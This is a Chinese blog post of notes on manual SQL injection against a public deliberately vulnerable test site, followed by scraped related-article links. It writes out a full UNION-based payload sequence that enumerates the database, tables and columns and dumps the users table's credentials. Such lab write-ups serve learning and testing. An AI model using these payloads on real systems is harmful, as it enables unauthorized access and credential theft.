SQL手工注入网站笔记
SQL手工注入网站笔记
目标网站:http://testphp.vulnweb.com/listproducts.php?cat=1
1.判断注入点:
http://testphp.vulnweb.com/listproducts.php?cat=1’
http://testphp.vulnweb.com/listproducts.php?cat=1 and 1=1 永真条件,回显正常
http://testphp.vulnweb.com/listproducts.php?cat=1 and 1=2 永假条件,回显空白界面
2.猜字段:
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 11 回显正常
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 12 回显报错
故共有11个字段
3.判断注入点:
http://testphp.vulnweb.com/listproducts.php?cat=-1 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11
即可判断,注入点可以为11,7,2,9
4.查询数据库版本:
http://testphp.vulnweb.com/listproducts.php?cat=-1 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,version()
数据库版本在5.0 以上,则会存在一个information_schema库存放所有表名称。
5.查数据库名:
http://testphp.vulnweb.com/listproducts.php?cat=-1%20+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,database()
可得知数据库名称为:acuart
6.查表名:
http://testphp.vulnweb.com/listproducts.php?cat=-1%20+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,table_name from information_schema.tables where table_schema=“acuart”
以上默认查数据库中第一个表名
http://testphp.vulnweb.com/listproducts.php?cat=-1%20+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,group_concat(table_name) from information_schema.tables where table_schema=“acuart”
查询该数据库中所有表名
7.查表的字段:
根据经验我们可以猜测 账号密码信息放置于users表中。
http://testphp.vulnweb.com/listproducts.php?cat=-1%20+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,group_concat(column_name) from information_schema.columns where table_schema=“acuart” and table_name=“users”
8.查询users表中的uname,pass
http://testphp.vulnweb.com/listproducts.php?cat=-1%20+UNION+ALL+SELECT+1,pass,3,4,5,6,uname,8,9,10,11 from users
由此获得账号:test 密码:test
SQL手工注入网站笔记相关推荐
- SQL手工注入入门级笔记(更新中)
一.字符型注入 针对如下php代码进行注入: $sql="select user_name from users where name='$_GET['name']'"; 正常访问 ...
- 墨者学院刷题笔记——SQL手工注入漏洞测试(MongoDB数据库)
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL手工注入漏洞测试(MongoDB数据库). 一.题目简介 我们这里采用墨者学院的MongoDB数据库渗透测试题目,其地址为:https:/ ...
- 墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入.同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清 ...
- 墨者学院01 SQL手工注入漏洞测试(MySQL数据库)
问题描述 鉴于我已经两周没能成功运行攻防世界的靶场环境...于是昨天又搜了一些网站,感觉墨者学院的题目还可以~ SQL手工注入虽然是一个已经被安全博主讲烂的主题,但是我之前很少有从头到尾实践手工注入的 ...
- python sql注入脚本_python辅助sql手工注入猜解数据库案例分析
发现存在sql注入漏洞 简单一点可以直接用sqlmap工具暴库 但是如果想深入理解sql注入的原理,可以尝试手工注入,配合python脚本实现手工猜解数据库 首先hachbar开启 获取cms登录后的 ...
- SQL手工注入漏洞测试(Oracle数据库)
SQL手工注入漏洞测试(Oracle数据库) 0x01前言 本文旨在讲述Oracle数据库多种情况下如何进行注入 靶场地址:SQL手工注入漏洞测试(Oracle数据库)_SQL注入_在线靶场_墨者学院 ...
- Oracle数据库注入-墨者学院(SQL手工注入漏洞测试(Oracle数据库))
本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(Oracle数据库). 地址:http://124.70.22.208:42948/new_list.php?id=1(注意地址已 ...
- 墨者学院SQL手工注入靶场漏洞详解
墨者学院SQL手工注入靶场漏洞详解 目录 靶场地址 步骤详解 目录 靶场地址 该靶场由墨者学院安全工程师"墨者"所搭建,靶场环境为Nginx+PHP+MySQL,启动靶场只需1墨币 ...
- SQLServer数据库注入-墨者学院(SQL手工注入漏洞测试(Sql Server数据库))
本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(Sql Server数据库). 地址:http://219.153.49.228:42295/new_list.asp?id=2( ...
最新文章
- 一文告诉你,大数据在智慧医疗领域发挥的作用
- 备战2020腾讯广告算法大赛:(2017-2019比赛开源和数据等)
- python从2.6升到2.7后 桌面输入法图标不见
- 安全——《微服务设计》读书笔记
- python备份目录下文件夹_Python备份目录及目录下的全部内容的实现方法
- 结构型设计模式 (1)—— 适配器模式(Adapter Pattern)
- [LeetCode][easy]Reformat The String
- Windows系统冗余log的清理bat脚本
- Redis 雪崩和击穿
- 函数信号发生器的功能介绍
- 【锋迷商城】01数据库设计
- 领先一步,步步领先:编程教育已进入中小学生课堂
- jupyter修改工作路径提示找不到指定模块
- 蔷薇灵动或成为云安全领域“独角兽”?
- 极客日报:字节跳动辟谣“出售AI技术”和“成立打车项目”;GitHub 因代码版权问题遭抵制;贝佐斯正式卸任亚马逊 CEO
- 利用开源工具搭一套汉英翻译系统(一):预处理工具
- 手把手教你用CS1802A开卡工具和MAS0902量产工具开卡CS1802A+镁光PFH18 N18颗粒
- java -jar 包编译在线工具
- KYC (Know Your Customer) 详述篇(上)
- 手把手教你安装虚拟机(官网下载VMware)
热门文章
- java中scanner中nextint,Java Scanner nextInt()方法
- 【C语言】【26】switch运用
- win台式找不到计算机管理,win10系统打开计算机管理提示windows找不到文件computer management.lnk的具体方案...
- mysql怎么写数据存储过程_数据库存储过程要怎么写
- 5.SQL数据库存储过程操作
- 【命理数学】六十甲子表为什么是六十呢
- 装饰者模式及其在 Android Context 中的应用
- FreeBSD 下载 Exif扩展
- 双色Hanoi塔问题-递归
- Datawhale 零基础入门数据挖掘心跳信号分类学习反馈04